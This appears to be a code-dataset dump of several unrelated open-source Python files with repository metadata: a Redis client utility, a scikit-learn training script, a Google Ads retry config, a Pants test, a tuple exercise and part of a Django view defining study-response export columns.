* empty scheme is treated as unix socket path no further parsing is done.
* 'unix://' scheme is treated as unix socket path and parsed.
* Multiple query parameter values and blank values are considered error.
* DB number specified as path and as query parameter is considered error.
* Password specified in userinfo and as query parameter is
considered error.
"""
r = urlparse(url)
assert r.scheme in ('', 'redis', 'rediss', 'unix'), (
"Unsupported URI scheme", r.scheme)
if r.scheme == '':
return url, {}
query = {}
for p, v in parse_qsl(r.query, keep_blank_values=True):
assert p not in query, ("Multiple parameters are not allowed", p, v)
assert v, ("Empty parameters are not allowed", p, v)
query[p] = v
if r.scheme == 'unix':
assert r.path, ("Empty path is not allowed", url)
assert not r.netloc, (
"Netlocation is not allowed for unix scheme", r.netloc)
return r.path, _parse_uri_options(query, '', r.password)
address = (r.hostname or 'localhost', int(r.port or 6379))
path = r.path
if path.startswith('/'):
path = r.path[1:]
options = _parse_uri_options(query, path, r.password)
if r.scheme == 'rediss':
options['ssl'] = True
return address, options
def _parse_uri_options(params, path, password):
def parse_db_num(val):
if not val:
return
assert val.isdecimal(), ("Invalid decimal integer", val)
assert val == '0' or not val.startswith('0'), (
"Expected integer without leading zeroes", val)
return int(val)
options = {}
db1 = parse_db_num(path)
db2 = parse_db_num(params.get('db'))
assert db1 is None or db2 is None, (
"Single DB value expected, got path and query", db1, db2)
if db1 is not None:
options['db'] = db1
elif db2 is not None:
options['db'] = db2
password2 = params.get('password')
assert not password or not password2, (
"Single password value is expected, got in net location and query")
if password:
options['password'] = password
elif password2:
options['password'] = password2
if 'encoding' in params:
options['encoding'] = params['encoding']
if 'errors' in params:
options['errors'] = params['errors']
if 'ssl' in params:
assert params['ssl'] in ('true', 'false'), (
"Expected 'ssl' param to be 'true' or 'false' only",
params['ssl'])
options['ssl'] = params['ssl'] == 'true'
if 'timeout' in params:
options['timeout'] = float(params['timeout'])
return options
class CloseEvent:
def __init__(self, on_close):
self._close_init = asyncio.Event()
self._close_done = asyncio.Event()
self._on_close = on_close
async def wait(self):
await self._close_init.wait()
await self._close_done.wait()
def is_set(self):
return self._close_done.is_set() or self._close_init.is_set()
def set(self):
if self._close_init.is_set():
return
task = asyncio.ensure_future(self._on_close())
task.add_done_callback(self._cleanup)
self._close_init.set()
def _cleanup(self, task):
self._on_close = None
self._close_done.set()
get_event_loop = getattr(asyncio, 'get_running_loop', asyncio.get_event_loop)
| 27.8583 | 79 | 0.608923 | import asyncio
import sys
from urllib.parse import urlparse, parse_qsl
from .log import logger
_NOTSET = object()
IS_PY38 = sys.version_info >= (3, 8)
_converters = {
bytes: lambda val: val,
bytearray: lambda val: val,
str: lambda val: val.encode(),
int: lambda val: b'%d' % val,
float: lambda val: b'%r' % val,
}
def encode_command(*args, buf=None):
if buf is None:
buf = bytearray()
buf.extend(b'*%d\r\n' % len(args))
try:
for arg in args:
barg = _converters[type(arg)](arg)
buf.extend(b'$%d\r\n%s\r\n' % (len(barg), barg))
except KeyError:
raise TypeError("Argument {!r} expected to be of bytearray, bytes,"
" float, int, or str type".format(arg))
return buf
def decode(obj, encoding, errors):
if errors is None:
errors = 'strict'
if isinstance(obj, bytes):
return obj.decode(encoding, errors)
elif isinstance(obj, list):
return [decode(o, encoding, errors) for o in obj]
return obj
async def wait_ok(fut):
res = await fut
if res in (b'QUEUED', 'QUEUED'):
return res
return res in (b'OK', 'OK')
async def wait_convert(fut, type_, **kwargs):
result = await fut
if result in (b'QUEUED', 'QUEUED'):
return result
return type_(result, **kwargs)
async def wait_make_dict(fut):
res = await fut
if res in (b'QUEUED', 'QUEUED'):
return res
it = iter(res)
return dict(zip(it, it))
class coerced_keys_dict(dict):
def __getitem__(self, other):
if not isinstance(other, bytes):
other = _converters[type(other)](other)
return dict.__getitem__(self, other)
def __contains__(self, other):
if not isinstance(other, bytes):
other = _converters[type(other)](other)
return dict.__contains__(self, other)
class _ScanIter:
__slots__ = ('_scan', '_cur', '_ret')
def __init__(self, scan):
self._scan = scan
self._cur = b'0'
self._ret = []
def __aiter__(self):
return self
async def __anext__(self):
while not self._ret and self._cur:
self._cur, self._ret = await self._scan(self._cur)
if not self._cur and not self._ret:
raise StopAsyncIteration
else:
ret = self._ret.pop(0)
return ret
def _set_result(fut, result, *info):
if fut.done():
logger.debug("Waiter future is already done %r %r", fut, info)
assert fut.cancelled(), (
"waiting future is in wrong state", fut, result, info)
else:
fut.set_result(result)
def _set_exception(fut, exception):
if fut.done():
logger.debug("Waiter future is already done %r", fut)
assert fut.cancelled(), (
"waiting future is in wrong state", fut, exception)
else:
fut.set_exception(exception)
def parse_url(url):
r = urlparse(url)
assert r.scheme in ('', 'redis', 'rediss', 'unix'), (
"Unsupported URI scheme", r.scheme)
if r.scheme == '':
return url, {}
query = {}
for p, v in parse_qsl(r.query, keep_blank_values=True):
assert p not in query, ("Multiple parameters are not allowed", p, v)
assert v, ("Empty parameters are not allowed", p, v)
query[p] = v
if r.scheme == 'unix':
assert r.path, ("Empty path is not allowed", url)
assert not r.netloc, (
"Netlocation is not allowed for unix scheme", r.netloc)
return r.path, _parse_uri_options(query, '', r.password)
address = (r.hostname or 'localhost', int(r.port or 6379))
path = r.path
if path.startswith('/'):
path = r.path[1:]
options = _parse_uri_options(query, path, r.password)
if r.scheme == 'rediss':
options['ssl'] = True
return address, options
def _parse_uri_options(params, path, password):
def parse_db_num(val):
if not val:
return
assert val.isdecimal(), ("Invalid decimal integer", val)
assert val == '0' or not val.startswith('0'), (
"Expected integer without leading zeroes", val)
return int(val)
options = {}
db1 = parse_db_num(path)
db2 = parse_db_num(params.get('db'))
assert db1 is None or db2 is None, (
"Single DB value expected, got path and query", db1, db2)
if db1 is not None:
options['db'] = db1
elif db2 is not None:
options['db'] = db2
password2 = params.get('password')
assert not password or not password2, (
"Single password value is expected, got in net location and query")
if password:
options['password'] = password
elif password2:
options['password'] = password2
if 'encoding' in params:
options['encoding'] = params['encoding']
if 'errors' in params:
options['errors'] = params['errors']
if 'ssl' in params:
assert params['ssl'] in ('true', 'false'), (
"Expected 'ssl' param to be 'true' or 'false' only",
params['ssl'])
options['ssl'] = params['ssl'] == 'true'
if 'timeout' in params:
options['timeout'] = float(params['timeout'])
return options
class CloseEvent:
def __init__(self, on_close):
self._close_init = asyncio.Event()
self._close_done = asyncio.Event()
self._on_close = on_close
async def wait(self):
await self._close_init.wait()
await self._close_done.wait()
def is_set(self):
return self._close_done.is_set() or self._close_init.is_set()
def set(self):
if self._close_init.is_set():
return
task = asyncio.ensure_future(self._on_close())
task.add_done_callback(self._cleanup)
self._close_init.set()
def _cleanup(self, task):
self._on_close = None
self._close_done.set()
get_event_loop = getattr(asyncio, 'get_running_loop', asyncio.get_event_loop)
| true | true |
f72ed7c91647a2ffe95753344f2a7f08a78ecf34 | 1,683 | py | Python | example/iris-data-classifier/ML-React-App-Template/service/model_generator.py | adelmuursepp/ML-React-App-Template | d0afed66b8dd037464edc39b1be7709b6207e834 | [
"MIT"
] | null | null | null | example/iris-data-classifier/ML-React-App-Template/service/model_generator.py | adelmuursepp/ML-React-App-Template | d0afed66b8dd037464edc39b1be7709b6207e834 | [
"MIT"
] | 5 | 2021-03-10T17:10:21.000Z | 2021-10-06T16:34:17.000Z | example/iris-data-classifier/ML-React-App-Template/service/model_generator.py | adelmuursepp/ML-React-App-Template | d0afed66b8dd037464edc39b1be7709b6207e834 | [
"MIT"
] | null | null | null | # Import libraries
import numpy as np
print('imported numpy')
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.externals import joblib
import pandas as pd
#Otsustuspuud
from sklearn.tree import DecisionTreeClassifier
print('imported all')
data_table = pd.read_csv('postags_lemmas_levels_data.csv')
data_table = data_table.drop(['Unnamed: 0','tekstikood', 'filename'], 1)
print('read data')
# data_table.groupby("keeletase").A.plot(kind='kde')
#data_table.groupby("keeletase").A.hist(alpha=0.4)|
from sklearn.preprocessing import LabelEncoder
labelencoder_0 = LabelEncoder() #independent variable encoder
data_table.iloc[:,17] = labelencoder_0.fit_transform(data_table.iloc[:,17])
#Transforming values into percentages of total and splitting into target and features
features = data_table.loc[:, "A":"Z"]
target_var = data_table.loc[:, "keeletase"]
print('split to test and train')
# X_train, X_test, y_train, y_test =\
# train_test_split(features.loc[:,'A':"Z"], target_var, test_size = 0.5, random_state=1111)
# Get the dataset
# dataset = datasets.load_iris()
# Split the dataset into features and labels
X = features
y = target_var
# Split the dataset into training (80%) and testing (20%) data
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0, shuffle = True)
# Build the classifier and make prediction
classifier = DecisionTreeClassifier()
classifier.fit(X_train, y_train)
print('fit trainging data')
prediction = classifier.predict(X_test)
# Print the confusion matrix
# Save the model to disk
joblib.dump(classifier, 'classifier.joblib')
| 25.5 | 108 | 0.764112 |
import numpy as np
print('imported numpy')
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.externals import joblib
import pandas as pd
from sklearn.tree import DecisionTreeClassifier
print('imported all')
data_table = pd.read_csv('postags_lemmas_levels_data.csv')
data_table = data_table.drop(['Unnamed: 0','tekstikood', 'filename'], 1)
print('read data')
from sklearn.preprocessing import LabelEncoder
labelencoder_0 = LabelEncoder()
data_table.iloc[:,17] = labelencoder_0.fit_transform(data_table.iloc[:,17])
features = data_table.loc[:, "A":"Z"]
target_var = data_table.loc[:, "keeletase"]
print('split to test and train')
X = features
y = target_var
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0, shuffle = True)
classifier = DecisionTreeClassifier()
classifier.fit(X_train, y_train)
print('fit trainging data')
prediction = classifier.predict(X_test)
joblib.dump(classifier, 'classifier.joblib')
| true | true |
f72ed89ef91faf30d9d61698bce073331a1ee00a | 1,185 | py | Python | google/ads/google_ads/v6/services/search_term_view_service_client_config.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | null | null | null | google/ads/google_ads/v6/services/search_term_view_service_client_config.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | null | null | null | google/ads/google_ads/v6/services/search_term_view_service_client_config.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | null | null | null | config = {
"interfaces": {
"google.ads.googleads.v6.services.SearchTermViewService": {
"retry_codes": {
"retry_policy_1_codes": [
"UNAVAILABLE",
"DEADLINE_EXCEEDED"
],
"no_retry_codes": []
},
"retry_params": {
"retry_policy_1_params": {
"initial_retry_delay_millis": 5000,
"retry_delay_multiplier": 1.3,
"max_retry_delay_millis": 60000,
"initial_rpc_timeout_millis": 3600000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 3600000,
"total_timeout_millis": 3600000
},
"no_retry_params": {
"initial_retry_delay_millis": 0,
"retry_delay_multiplier": 0.0,
"max_retry_delay_millis": 0,
"initial_rpc_timeout_millis": 0,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 0,
"total_timeout_millis": 0
}
},
"methods": {
"GetSearchTermView": {
"timeout_millis": 60000,
"retry_codes_name": "retry_policy_1_codes",
"retry_params_name": "retry_policy_1_params"
}
}
}
}
}
| 28.902439 | 63 | 0.562025 | config = {
"interfaces": {
"google.ads.googleads.v6.services.SearchTermViewService": {
"retry_codes": {
"retry_policy_1_codes": [
"UNAVAILABLE",
"DEADLINE_EXCEEDED"
],
"no_retry_codes": []
},
"retry_params": {
"retry_policy_1_params": {
"initial_retry_delay_millis": 5000,
"retry_delay_multiplier": 1.3,
"max_retry_delay_millis": 60000,
"initial_rpc_timeout_millis": 3600000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 3600000,
"total_timeout_millis": 3600000
},
"no_retry_params": {
"initial_retry_delay_millis": 0,
"retry_delay_multiplier": 0.0,
"max_retry_delay_millis": 0,
"initial_rpc_timeout_millis": 0,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 0,
"total_timeout_millis": 0
}
},
"methods": {
"GetSearchTermView": {
"timeout_millis": 60000,
"retry_codes_name": "retry_policy_1_codes",
"retry_params_name": "retry_policy_1_params"
}
}
}
}
}
| true | true |
f72ed8da97fec762efa00349e44eae5dbdee44f0 | 1,233 | py | Python | src/python/pants/core/goals/fmt_integration_test.py | thamenato/pants | bc4a8fb3f07f6145649f02b06a1e5599aa28b36c | [
"Apache-2.0"
] | null | null | null | src/python/pants/core/goals/fmt_integration_test.py | thamenato/pants | bc4a8fb3f07f6145649f02b06a1e5599aa28b36c | [
"Apache-2.0"
] | null | null | null | src/python/pants/core/goals/fmt_integration_test.py | thamenato/pants | bc4a8fb3f07f6145649f02b06a1e5599aa28b36c | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import re
from pants.testutil.pants_integration_test import (
ensure_daemon,
run_pants_with_workdir,
temporary_workdir,
)
from pants.util.contextutil import overwrite_file_content
from pants.util.dirutil import read_file
@ensure_daemon
def test_fmt_then_edit():
f = "examples/src/python/example/hello/greet/greet.py"
with temporary_workdir() as workdir:
def run() -> None:
run_pants_with_workdir(
[
"--backend-packages=['pants.backend.python', 'pants.backend.python.lint.black']",
"fmt",
f,
],
workdir=workdir,
).assert_success()
# Run once to start up, and then capture the file content.
run()
good_content = read_file(f)
# Edit the file.
with overwrite_file_content(f, lambda c: re.sub(b"def greet", b"def greet", c)):
assert good_content != read_file(f)
# Re-run and confirm that the file was fixed.
run()
assert good_content == read_file(f)
| 30.073171 | 101 | 0.612328 |
import re
from pants.testutil.pants_integration_test import (
ensure_daemon,
run_pants_with_workdir,
temporary_workdir,
)
from pants.util.contextutil import overwrite_file_content
from pants.util.dirutil import read_file
@ensure_daemon
def test_fmt_then_edit():
f = "examples/src/python/example/hello/greet/greet.py"
with temporary_workdir() as workdir:
def run() -> None:
run_pants_with_workdir(
[
"--backend-packages=['pants.backend.python', 'pants.backend.python.lint.black']",
"fmt",
f,
],
workdir=workdir,
).assert_success()
run()
good_content = read_file(f)
with overwrite_file_content(f, lambda c: re.sub(b"def greet", b"def greet", c)):
assert good_content != read_file(f)
run()
assert good_content == read_file(f)
| true | true |
f72ed91db2e8e38da901631f369f411c385dca7e | 1,057 | py | Python | ryu/app/simulation/test.py | yuesir137/SDN-CLB | 58b12a9412cffdf2945440528b1885c8899edd08 | [
"Apache-2.0"
] | null | null | null | ryu/app/simulation/test.py | yuesir137/SDN-CLB | 58b12a9412cffdf2945440528b1885c8899edd08 | [
"Apache-2.0"
] | null | null | null | ryu/app/simulation/test.py | yuesir137/SDN-CLB | 58b12a9412cffdf2945440528b1885c8899edd08 | [
"Apache-2.0"
] | null | null | null | import math
import os
import queue
import random
import threading
import time
from pprint import pprint
from networkx import DiGraph
from Node import Switch
class my_thread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.flow_queue = []
def run(self) -> None:
while True:
num = random.randint(1, 10)
self.flow_queue.append(num)
print(self.flow_queue)
sleep_time = random.randint(1, 3)
print('sleep ', sleep_time)
time.sleep(sleep_time)
sw_num = 40
flow_thread_num = 10
path_len = 6.384
flow_num = sw_num * flow_thread_num / 2
flow_table_num=flow_num*path_len
switch_big=flow_table_num/5/sw_num
switch_small=switch_big*4
switch_sum=flow_table_num/sw_num
controller_big= switch_big*(sw_num/4)
controller_small=controller_big*4
print(controller_big)
class C:
def __init__(self,name):
self.name=name
def __str__(self):
return self.name
c1=C('c1')
c2=C('c2')
temp=c1
c1=c2
print(temp)
print(c1)
| 19.218182 | 45 | 0.689688 | import math
import os
import queue
import random
import threading
import time
from pprint import pprint
from networkx import DiGraph
from Node import Switch
class my_thread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.flow_queue = []
def run(self) -> None:
while True:
num = random.randint(1, 10)
self.flow_queue.append(num)
print(self.flow_queue)
sleep_time = random.randint(1, 3)
print('sleep ', sleep_time)
time.sleep(sleep_time)
sw_num = 40
flow_thread_num = 10
path_len = 6.384
flow_num = sw_num * flow_thread_num / 2
flow_table_num=flow_num*path_len
switch_big=flow_table_num/5/sw_num
switch_small=switch_big*4
switch_sum=flow_table_num/sw_num
controller_big= switch_big*(sw_num/4)
controller_small=controller_big*4
print(controller_big)
class C:
def __init__(self,name):
self.name=name
def __str__(self):
return self.name
c1=C('c1')
c2=C('c2')
temp=c1
c1=c2
print(temp)
print(c1)
| true | true |
f72eda0648c579ea231b336ff3104e38d1b2f1b9 | 777 | py | Python | CursoEmVideo/Mundo_3/Aula # 16 - Tuplas/aula16_exe#73.py | heloisaldanha/PythonExercises | 877c11fcd37911e85d2ed5f008e72ef5b8f6b0f7 | [
"MIT"
] | null | null | null | CursoEmVideo/Mundo_3/Aula # 16 - Tuplas/aula16_exe#73.py | heloisaldanha/PythonExercises | 877c11fcd37911e85d2ed5f008e72ef5b8f6b0f7 | [
"MIT"
] | null | null | null | CursoEmVideo/Mundo_3/Aula # 16 - Tuplas/aula16_exe#73.py | heloisaldanha/PythonExercises | 877c11fcd37911e85d2ed5f008e72ef5b8f6b0f7 | [
"MIT"
] | null | null | null | '''
Crie uma tupla preenchida com os 20 times do brasileirão da série A na ordem de colocação.
Depois mostre:
a: Os 5 primeiros colocados
b: Os últimos 4 colocados
c: times em ordem alfabética
d: em que posição está o time da Chapecoense?
'''
times = ('Corinthians', 'Palmeiras', 'Santos', 'Grêmio', 'Cruzeiro', 'Flamengo', 'Vasco',
'Chapecoense', 'Atlético-MG', 'Botafogo', 'Atlético-PR', 'Bahia', 'São Paulo',
'Fluminense', 'Sport', 'Vitória', 'Coritiba', 'Avaí', 'Ponte Preta', 'Atlético-GO')
print('Os 5 primeiros colocados são: {}'.format(times[0:5]))
print('Os 4 últimos colocados: {}'.format(times[-4:]))
print('Os times em ordem alfabética: {}'.format(sorted(times)))
print('O Chapecoense está na posição: {}'.format(times.index('Chapecoense') + 1))
| 45.705882 | 92 | 0.683398 |
times = ('Corinthians', 'Palmeiras', 'Santos', 'Grêmio', 'Cruzeiro', 'Flamengo', 'Vasco',
'Chapecoense', 'Atlético-MG', 'Botafogo', 'Atlético-PR', 'Bahia', 'São Paulo',
'Fluminense', 'Sport', 'Vitória', 'Coritiba', 'Avaí', 'Ponte Preta', 'Atlético-GO')
print('Os 5 primeiros colocados são: {}'.format(times[0:5]))
print('Os 4 últimos colocados: {}'.format(times[-4:]))
print('Os times em ordem alfabética: {}'.format(sorted(times)))
print('O Chapecoense está na posição: {}'.format(times.index('Chapecoense') + 1))
| true | true |
f72edb8b6c0044eda2bec7da52e82df5b9432d92 | 80,572 | py | Python | exp/views/responses.py | manybabies/MBAH-LookIt-API | 18474ceac3dcc8365a5559cf84e9f460671993f5 | [
"MIT"
] | 9 | 2018-06-26T17:15:27.000Z | 2021-11-21T17:19:01.000Z | exp/views/responses.py | manybabies/MBAH-LookIt-API | 18474ceac3dcc8365a5559cf84e9f460671993f5 | [
"MIT"
] | 496 | 2018-02-19T19:18:24.000Z | 2022-03-31T17:01:16.000Z | exp/views/responses.py | manybabies/MBAH-LookIt-API | 18474ceac3dcc8365a5559cf84e9f460671993f5 | [
"MIT"
] | 16 | 2018-07-06T23:35:39.000Z | 2021-11-21T17:52:58.000Z | import io
import json
import zipfile
from functools import cached_property
from typing import Callable, Dict, KeysView, List, NamedTuple, Set, Union
import requests
from django.contrib import messages
from django.contrib.auth.mixins import UserPassesTestMixin
from django.core.exceptions import ObjectDoesNotExist, SuspiciousOperation
from django.core.files import File
from django.core.paginator import Paginator
from django.db.models import Prefetch
from django.http import (
FileResponse,
HttpResponse,
HttpResponseRedirect,
JsonResponse,
StreamingHttpResponse,
)
from django.shortcuts import redirect, reverse
from django.views import generic
from django.views.generic.base import View
from django.views.generic.detail import SingleObjectMixin
from django.views.generic.list import MultipleObjectMixin
from accounts.utils import (
hash_child_id,
hash_demographic_id,
hash_id,
hash_participant_id,
)
from exp.utils import (
RESPONSE_PAGE_SIZE,
csv_dict_output_and_writer,
csv_namedtuple_writer,
flatten_dict,
round_age,
round_ages_from_birthdays,
study_name_for_files,
)
from exp.views.mixins import (
CanViewStudyResponsesMixin,
ResearcherLoginRequiredMixin,
SingleObjectFetchProtocol,
StudyLookupMixin,
)
from studies.models import Feedback, Response, Study, Video
from studies.permissions import StudyPermission
from studies.queries import (
get_consent_statistics,
get_responses_with_current_rulings_and_videos,
)
from studies.tasks import build_framedata_dict, build_zipfile_of_videos
class ResponseDataColumn(NamedTuple):
# id: Unique key to identify data. Used as CSV column header and any portion before __ is used to create a
# sub-dictionary for JSON data.
id: str
description: str # Description for data dictionary
extractor: Callable[
[Union[Response, Dict]], Union[str, List]
] # Function to extract value from response instance or dict
optional: bool = False # is a column the user checks a box to include?
name: str = "" # used in template form for optional columns
include_by_default: bool = False # whether to initially check checkbox for field
identifiable: bool = False # used to determine filename signaling
# Columns for response downloads. Extractor functions expect Response instance
RESPONSE_COLUMNS = [
ResponseDataColumn(
id="response__id",
description="Short ID for this response",
extractor=lambda resp: str(resp.id),
name="Response ID",
),
ResponseDataColumn(
id="response__uuid",
description="Unique identifier for response. Can be used to match data to video filenames.",
extractor=lambda resp: str(resp.uuid),
name="Response UUID",
),
ResponseDataColumn(
id="response__date_created",
description="Timestamp for when participant began session, in format e.g. 2019-11-07 17:13:38.702958+00:00",
extractor=lambda resp: str(resp.date_created),
name="Date created",
),
ResponseDataColumn(
id="response__completed",
description=(
"Whether the participant submitted the exit survey; depending on study criteria, this may not align "
"with whether the session is considered complete. E.g., participant may have left early but submitted "
"exit survey, or may have completed all test trials but not exit survey."
),
extractor=lambda resp: resp.completed,
name="Completed",
),
ResponseDataColumn(
id="response__withdrawn",
description=(
"Whether the participant withdrew permission for viewing/use of study video beyond consent video. If "
"true, video will not be available and must not be used."
),
extractor=lambda resp: resp.withdrawn,
name="Withdrawn",
),
ResponseDataColumn(
id="response__parent_feedback",
description=(
"Freeform parent feedback entered into the exit survey, if any. This field may incidentally contain "
"identifying or sensitive information depending on what parents say, so it should be scrubbed or "
"omitted from published data."
),
extractor=lambda resp: resp.parent_feedback,
name="Parent feedback",
),
ResponseDataColumn(
id="response__birthdate_difference",
description=(
"Difference between birthdate entered in exit survey, if any, and birthdate of registered child "
"participating. Positive values mean that the birthdate from the exit survey is LATER. Blank if "
"no birthdate available from the exit survey."
),
extractor=lambda resp: resp.birthdate_difference,
name="Birthdate difference",
),
ResponseDataColumn(
id="response__video_privacy",
description=(
"Privacy level for videos selected during the exit survey, if the parent completed the exit survey. "
"Possible levels are 'private' (only people listed on your IRB protocol can view), 'scientific' "
"(can share for scientific/educational purposes), and 'public' (can also share for publicity). "
"In no cases may videos be shared for commercial purposes. If this is missing (e.g., family stopped "
"just after the consent form and did not complete the exit survey), you must treat the video as "
"private."
),
extractor=lambda resp: resp.privacy,
name="Video privacy level",
),
ResponseDataColumn(
id="response__databrary",
description=(
"Whether the parent agreed to share video data on Databrary - 'yes' or 'no'. If missing, you must "
"treat the video as if 'no' were selected. If 'yes', the video privacy selections also apply to "
"authorized Databrary users."
),
extractor=lambda resp: resp.databrary,
name="Databrary sharing",
),
ResponseDataColumn(
id="response__is_preview",
description=(
"Whether this response was generated by a researcher previewing the experiment. Preview data should "
"not be used in any actual analyses."
),
extractor=lambda resp: resp.is_preview,
name="Preview",
),
ResponseDataColumn(
id="consent__ruling",
description=(
"Most recent consent video ruling: one of 'accepted' (consent has been reviewed and judged to indidate "
"informed consent), 'rejected' (consent has been reviewed and judged not to indicate informed "
"consent -- e.g., video missing or parent did not read statement), or 'pending' (no current judgement, "
"e.g. has not been reviewed yet or waiting on parent email response')"
),
extractor=lambda resp: resp.most_recent_ruling,
),
ResponseDataColumn(
id="consent__arbiter",
description="Name associated with researcher account that made the most recent consent ruling",
extractor=lambda resp: resp.most_recent_ruling_arbiter,
),
ResponseDataColumn(
id="consent__time",
description="Timestamp of most recent consent ruling, format e.g. 2019-12-09 20:40",
extractor=lambda resp: resp.most_recent_ruling_date,
),
ResponseDataColumn(
id="consent__comment",
description=(
"Comment associated with most recent consent ruling (may be used to track e.g. any cases where consent "
"was confirmed by email)"
),
extractor=lambda resp: resp.most_recent_ruling_comment,
),
ResponseDataColumn(
id="consent__time",
description="Timestamp of most recent consent ruling, format e.g. 2019-12-09 20:40",
extractor=lambda resp: resp.most_recent_ruling_date,
),
ResponseDataColumn(
id="study__uuid",
description="Unique identifier of study associated with this response. Same for all responses to a given Lookit study.",
extractor=lambda resp: str(resp.study.uuid),
),
ResponseDataColumn(
id="participant__global_id",
description=(
"Unique identifier for family account associated with this response. Will be the same for multiple "
"responses from a child and for siblings, and across different studies. MUST BE REDACTED FOR "
"PUBLICATION because this allows identification of families across different published studies, which "
"may have unintended privacy consequences. Researchers can use this ID to match participants across "
"studies (subject to their own IRB review), but would need to generate their own random participant "
"IDs for publication in that case. Use participant_hashed_id as a publication-safe alternative if "
"only analyzing data from one Lookit study."
),
extractor=lambda resp: str(resp.child.user.uuid),
optional=True,
name="Parent global ID",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="participant__hashed_id",
description=(
"Identifier for family account associated with this response. Will be the same for multiple responses "
"from a child and for siblings, but is unique to this study. This may be published directly."
),
extractor=lambda resp: hash_id(
resp.child.user.uuid,
resp.study.uuid,
resp.study.salt,
resp.study.hash_digits,
),
name="Parent ID",
),
ResponseDataColumn(
id="participant__nickname",
description=(
"Nickname associated with the family account for this response - generally the mom or dad's name. "
"Must be redacted for publication."
),
extractor=lambda resp: resp.child.user.nickname,
optional=True,
name="Parent name",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__global_id",
description=(
"Primary unique identifier for the child associated with this response. Will be the same for multiple "
"responses from one child, even across different Lookit studies. MUST BE REDACTED FOR PUBLICATION "
"because this allows identification of children across different published studies, which may have "
"unintended privacy consequences. Researchers can use this ID to match participants across studies "
"(subject to their own IRB review), but would need to generate their own random participant IDs for "
"publication in that case. Use child_hashed_id as a publication-safe alternative if only analyzing "
"data from one Lookit study."
),
extractor=lambda resp: str(resp.child.uuid),
optional=True,
name="Child global ID",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__hashed_id",
description=(
"Identifier for child associated with this response. Will be the same for multiple responses from a "
"child, but is unique to this study. This may be published directly."
),
extractor=lambda resp: hash_id(
resp.child.uuid, resp.study.uuid, resp.study.salt, resp.study.hash_digits
),
name="Child ID",
),
ResponseDataColumn(
id="child__name",
description=(
"Nickname for the child associated with this response. Not necessarily a real name (we encourage "
"initials, nicknames, etc. if parents aren't comfortable providing a name) but must be redacted for "
"publication of data."
),
extractor=lambda resp: resp.child.given_name,
optional=True,
name="Child name",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__birthday",
description=(
"Birthdate of child associated with this response. Must be redacted for publication of data (switch to "
"age at time of participation; either use rounded age, jitter the age, or redact timestamps of "
"participation)."
),
extractor=lambda resp: resp.child.birthday,
optional=True,
name="Birthdate",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__age_in_days",
description=(
"Age in days at time of response of child associated with this response, exact. This can be used in "
"conjunction with timestamps to calculate the child's birthdate, so must be jittered or redacted prior "
"to publication unless no timestamp information is shared."
),
extractor=lambda resp: (resp.date_created.date() - resp.child.birthday).days,
optional=True,
name="Age in days",
include_by_default=False,
identifiable=True,
),
ResponseDataColumn(
id="child__age_rounded",
description=(
"Age in days at time of response of child associated with this response, rounded to the nearest 10 "
"days if under 1 year old and to the nearest 30 days if over 1 year old. May be published; however, if "
"you have more than a few sessions per participant it would be possible to infer the exact age in days "
"(and therefore birthdate) with some effort. In this case you might consider directly jittering "
"birthdates."
),
extractor=lambda resp: str(
round_age(int((resp.date_created.date() - resp.child.birthday).days))
)
if (resp.date_created and resp.child.birthday)
else "",
optional=True,
name="Rounded age",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__gender",
description=(
"Parent-identified gender of child, one of 'm' (male), 'f' (female), 'o' (other), or 'na' (prefer not "
"to answer)"
),
extractor=lambda resp: resp.child.gender,
optional=True,
name="Child gender",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__age_at_birth",
description=(
"Gestational age at birth in weeks. One of '40 or more weeks', '39 weeks' through '24 weeks', "
"'Under 24 weeks', or 'Not sure or prefer not to answer'"
),
extractor=lambda resp: resp.child.age_at_birth,
optional=True,
name="Child gestational age",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__language_list",
description="List of languages spoken (using language codes in Lookit docs), separated by spaces",
extractor=lambda resp: resp.child.language_list,
optional=True,
name="Child languages",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__condition_list",
description="List of child characteristics (using condition/characteristic codes in Lookit docs), separated by spaces",
extractor=lambda resp: resp.child.condition_list,
optional=True,
name="Child conditions",
include_by_default=True,
identifiable=False,
),
ResponseDataColumn(
id="child__additional_information",
description=(
"Free response 'anything else you'd like us to know' field on child registration form for child "
"associated with this response. Should be redacted or reviewed prior to publication as it may include "
"names or other identifying information."
),
extractor=lambda resp: resp.child.additional_information,
optional=True,
name="Child additional information",
include_by_default=True,
identifiable=True,
),
ResponseDataColumn(
id="response__sequence",
description=(
"Each response_sequence.N field (response_sequence.0, response_sequence.1, etc.) gives the ID of the "
"Nth frame displayed during the session associated with this response. Responses may have different "
"sequences due to randomization or if a participant leaves early."
),
extractor=lambda resp: resp.sequence,
name="Response sequence",
),
ResponseDataColumn(
id="response__conditions",
description=(
"RESEARCHERS: EXPAND THIS SECTION BASED ON YOUR INDIVIDUAL STUDY. Each set of "
"response_conditions.N.(...) fields give information about condition assignment during a particular "
